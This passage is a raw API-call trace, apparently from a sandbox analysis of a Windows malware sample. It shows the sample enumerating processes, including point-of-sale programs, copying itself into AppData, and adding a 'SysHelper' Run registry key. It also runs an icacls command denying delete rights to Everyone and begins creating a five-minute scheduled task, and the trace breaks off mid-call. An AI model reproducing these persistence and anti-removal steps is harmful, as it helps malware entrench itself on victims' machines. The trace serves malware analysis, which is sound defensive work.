(dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x5c0 [0106.619] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.620] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x13d0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0106.620] CloseHandle (hObject=0x5c0) returned 1 [0106.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x5c0 [0106.621] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.622] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xab0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0106.622] CloseHandle (hObject=0x5c0) returned 1 [0106.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x5c0 [0106.622] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.623] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x330000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0106.624] CloseHandle (hObject=0x5c0) returned 1 [0106.624] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x5c0 [0106.624] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.625] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10c0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0106.625] CloseHandle (hObject=0x5c0) returned 1 [0106.625] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x5c0 [0106.625] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.626] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa30000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0106.627] CloseHandle (hObject=0x5c0) returned 1 [0106.627] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x5c0 [0106.627] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.628] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1160000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0106.629] CloseHandle (hObject=0x5c0) returned 1 [0106.629] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x5c0 [0106.629] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.630] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb80000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0106.630] CloseHandle (hObject=0x5c0) returned 1 [0106.630] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x5c0 [0106.631] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.632] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9a0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0106.632] CloseHandle (hObject=0x5c0) returned 1 [0106.632] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x5c0 [0106.632] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.634] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1170000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0106.634] CloseHandle (hObject=0x5c0) returned 1 [0106.634] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b4) returned 0x5c0 [0106.634] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.636] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x360000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="kentucky-phrases-casual.exe") returned 0x1b [0106.636] CloseHandle (hObject=0x5c0) returned 1 [0106.636] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c4) returned 0x5c0 [0106.636] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.637] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1240000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="breaking.exe") returned 0xc [0106.638] CloseHandle (hObject=0x5c0) returned 1 [0106.638] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d4) returned 0x5c0 [0106.638] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.639] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1b0000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="enforcement_wv_transmitted.exe") returned 0x1e [0106.639] CloseHandle (hObject=0x5c0) returned 1 [0106.639] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e4) returned 0x5c0 [0106.639] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.640] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x60000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="friend.exe") returned 0xa [0106.641] CloseHandle (hObject=0x5c0) returned 1 [0106.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa14) returned 0x0 [0106.641] CloseHandle (hObject=0x0) returned 0 [0106.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0106.641] CloseHandle (hObject=0x0) returned 0 [0106.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6c8) returned 0x0 [0106.641] CloseHandle (hObject=0x0) returned 0 [0106.641] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa94) returned 0x5c0 [0106.641] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 1 [0106.642] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x400000, lpBaseName=0x18d068, nSize=0x400 | out: lpBaseName="OqRoSnESYXcDITEx.exe") returned 0x14 [0106.642] CloseHandle (hObject=0x5c0) returned 1 [0106.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x0 [0106.643] CloseHandle (hObject=0x0) returned 0 [0106.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x780) returned 0x0 [0106.643] CloseHandle (hObject=0x0) returned 0 [0106.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x138) returned 0x0 [0106.643] CloseHandle (hObject=0x0) returned 0 [0106.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x5c0 [0106.643] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18d884, cb=0x4, lpcbNeeded=0x18d868 | out: lphModule=0x18d884, lpcbNeeded=0x18d868) returned 0 [0106.643] CloseHandle (hObject=0x5c0) returned 1 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x28) returned 0x4a29bc0 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x4a55068 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x75dce18 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x4a58618 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x4a58880 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x75e2aa8 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x75e2d10 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x75e2f78 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x75e31e0 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x75e3448 [0106.643] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x25c) returned 0x75e36b0 [0106.644] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d868 | out: phkResult=0x18d868*=0x5c0) returned 0x0 [0106.644] RegQueryValueExW (in: hKey=0x5c0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d864, lpData=0x18bf90, lpcbData=0x18d848*=0x400 | out: lpType=0x18d864*=0x0, lpData=0x18bf90*=0x0, lpcbData=0x18d848*=0x400) returned 0x2 [0106.644] RegCloseKey (hKey=0x5c0) returned 0x0 [0106.644] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0106.644] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0106.644] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" " [0106.644] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe\" ", pNumArgs=0x18d82c | out: pNumArgs=0x18d82c) returned 0x4a4c8b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0106.645] lstrcpyW (in: lpString1=0x18b790, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" [0106.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe") returned="OqRoSnESYXcDITEx.exe" [0106.645] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18cf90 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0106.645] UuidCreate (in: Uuid=0x18d7dc | out: Uuid=0x18d7dc) returned 0x0 [0106.645] UuidToStringW (in: Uuid=0x18d7dc, StringUuid=0x18d870 | out: StringUuid=0x18d870) returned 0x0 [0106.645] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x50) returned 0x76007b8 [0106.645] RpcMgmtStatsVectorFree (in: StatsVector=0x18d870 | out: StatsVector=0x18d870) returned 0x0 [0106.645] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="a14790f6-2e96-4184-8635-958462b07e84" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84") returned 1 [0106.645] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\a14790f6-2e96-4184-8635-958462b07e84"), lpSecurityAttributes=0x0) returned 1 [0106.646] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xb0) returned 0x75b9590 [0106.646] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xb0) returned 0x75b9648 [0106.646] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84", pMore="OqRoSnESYXcDITEx.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe") returned 1 [0106.646] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\a14790f6-2e96-4184-8635-958462b07e84\\oqrosnesyxcditex.exe")) returned 0 [0106.646] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\a14790f6-2e96-4184-8635-958462b07e84\\oqrosnesyxcditex.exe"), bFailIfExists=0) returned 1 [0106.703] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d86c | out: phkResult=0x18d86c*=0x5c4) returned 0x0 [0106.704] lstrcpyW (in: lpString1=0x18c790, lpString2="\"" | out: lpString1="\"") returned="\"" [0106.704] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe" [0106.704] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe\" --AutoStart" [0106.704] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe\" --AutoStart") returned 115 [0106.704] RegSetValueExW (in: hKey=0x5c4, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe\" --AutoStart", cbData=0xe6 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\\OqRoSnESYXcDITEx.exe\" --AutoStart") returned 0x0 [0106.704] RegCloseKey (hKey=0x5c4) returned 0x0 [0106.704] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xd0) returned 0x757e5d8 [0106.704] SetLastError (dwErrCode=0x0) [0106.704] lstrcpyW (in: lpString1=0x18a790, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0106.704] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84" [0106.704] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0106.705] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d790*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d7ec | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\a14790f6-2e96-4184-8635-958462b07e84\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18d7ec*(hProcess=0x5c0, hThread=0x5c4, dwProcessId=0xaf8, dwThreadId=0xadc)) returned 1 [0106.726] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0106.741] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0106.940] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0106.944] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0106.959] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0106.975] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0106.990] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0107.006] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0107.021] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0107.055] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0107.068] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0107.084] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x102 [0107.100] WaitForSingleObject (hHandle=0x5c0, dwMilliseconds=0x1) returned 0x0 [0107.109] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75b9648 | out: hHeap=0x4a00000) returned 1 [0107.109] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x76007b8 | out: hHeap=0x4a00000) returned 1 [0107.109] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xd0) returned 0x757e788 [0107.109] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xd0) returned 0x757e860 [0107.109] CoInitialize (pvReserved=0x0) returned 0x0 [0107.728] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0107.728] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xd0) returned 0x757eae8 [0107.728] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18d854 | out: ppv=0x18d854*=0x6ca0b00) returned 0x0 [0108.004] TaskScheduler:ITaskService:Connect (This=0x6ca0b00, serverName=0x18d2e0*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x67, varVal2=0xd0), user=0x18d2f0*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xd8), domain=0x18d300*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), password=0x18d310*(varType=0x0, wReserved1=0x75e, wReserved2=0xd7fc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x4a00000)) returned 0x0 [0108.010] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c76c8 [0108.010] TaskScheduler:ITaskService:GetFolder (in: This=0x6ca0b00, Path="\\", ppFolder=0x18d85c | out: ppFolder=0x18d85c*=0x23ff98) returned 0x0 [0108.014] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c76c8 | out: hHeap=0x4a00000) returned 1 [0108.014] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c76c8 [0108.014] ITaskFolder:DeleteTask (This=0x23ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0108.016] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c76c8 | out: hHeap=0x4a00000) returned 1 [0108.016] TaskScheduler:ITaskService:NewTask (in: This=0x6ca0b00, flags=0x0, ppDefinition=0x18d860 | out: ppDefinition=0x18d860*=0x6ca0b88) returned 0x0 [0108.019] TaskScheduler:IUnknown:Release (This=0x6ca0b00) returned 0x1 [0108.019] ITaskDefinition:get_RegistrationInfo (in: This=0x6ca0b88, ppRegistrationInfo=0x18d834 | out: ppRegistrationInfo=0x18d834*=0x6ca0c48) returned 0x0 [0108.019] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.019] IRegistrationInfo:put_Author (This=0x6ca0c48, Author="Author Name") returned 0x0 [0108.019] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.019] IUnknown:Release (This=0x6ca0c48) returned 0x1 [0108.019] ITaskDefinition:get_Principal (in: This=0x6ca0b88, ppPrincipal=0x18d83c | out: ppPrincipal=0x18d83c*=0x6ca0dd8) returned 0x0 [0108.019] IPrincipal:put_LogonType (This=0x6ca0dd8, LogonType=3) returned 0x0 [0108.019] IUnknown:Release (This=0x6ca0dd8) returned 0x1 [0108.019] ITaskDefinition:get_Settings (in: This=0x6ca0b88, ppSettings=0x18d844 | out: ppSettings=0x18d844*=0x6ca0cf8) returned 0x0 [0108.020] ITaskSettings:put_StartWhenAvailable (This=0x6ca0cf8, StartWhenAvailable=1) returned 0x0 [0108.020] IUnknown:Release (This=0x6ca0cf8) returned 0x1 [0108.020] ITaskSettings:get_IdleSettings (in: This=0x6ca0cf8, ppIdleSettings=0x18d828 | out: ppIdleSettings=0x18d828*=0x6ca0d68) returned 0x0 [0108.020] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.020] IIdleSettings:put_WaitTimeout (This=0x6ca0d68, WaitTimeout="PT5M") returned 0x0 [0108.020] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.020] IUnknown:Release (This=0x6ca0d68) returned 0x1 [0108.020] ITaskDefinition:get_Triggers (in: This=0x6ca0b88, ppTriggers=0x18d824 | out: ppTriggers=0x18d824*=0x6ca0cb8) returned 0x0 [0108.020] ITriggerCollection:Create (in: This=0x6ca0cb8, Type=1, ppTrigger=0x18d830 | out: ppTrigger=0x18d830*=0x6ca0e38) returned 0x0 [0108.020] IUnknown:Release (This=0x6ca0cb8) returned 0x1 [0108.021] IUnknown:QueryInterface (in: This=0x6ca0e38, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18d84c | out: ppvObject=0x18d84c*=0x6ca0e38) returned 0x0 [0108.021] IUnknown:Release (This=0x6ca0e38) returned 0x2 [0108.021] ITrigger:get_Repetition (in: This=0x6ca0e38, ppRepeat=0x18d838 | out: ppRepeat=0x18d838*=0x6ca0e88) returned 0x0 [0108.021] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.021] IRepetitionPattern:put_Interval (This=0x6ca0e88, Interval="PT5M") returned 0x0 [0108.021] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.021] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.021] IRepetitionPattern:put_Duration (This=0x6ca0e88, Duration="") returned 0x0 [0108.022] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.023] ITrigger:put_Repetition (This=0x6ca0e38, Repetition=0x6ca0e88) returned 0x0 [0108.023] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.023] ITrigger:put_Id (This=0x6ca0e38, Id="Trigger1") returned 0x0 [0108.024] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.024] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0xc) returned 0x75c7710 [0108.024] ITrigger:put_EndBoundary (This=0x6ca0e38, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0108.024] HeapFree (in: hHeap=0x4a00000, dwFlags=0x0, lpMem=0x75c7710 | out: hHeap=0x4a00000) returned 1 [0108.024] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d30c | out: lpSystemTimeAsFileTime=0x18d30c*(dwLowDateTime=0xd9ca8660, dwHighDateTime=0x1d6d58a)) [0108.024] GetLastError () returned 0x0 [0108.024] RtlAllocateHeap (HeapHandle=0x4a00000, Flags=0x0, Size=0x24) returned 0x75ff000 [0108.024] GetLastError () returned 0x0 [0108.024] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0108.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d274 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d274) returned 26 [0108.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d274 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d274) returned 26 [0108.026] GetLastError () returned 0x0 [0108.026] RtlAllocateHeap 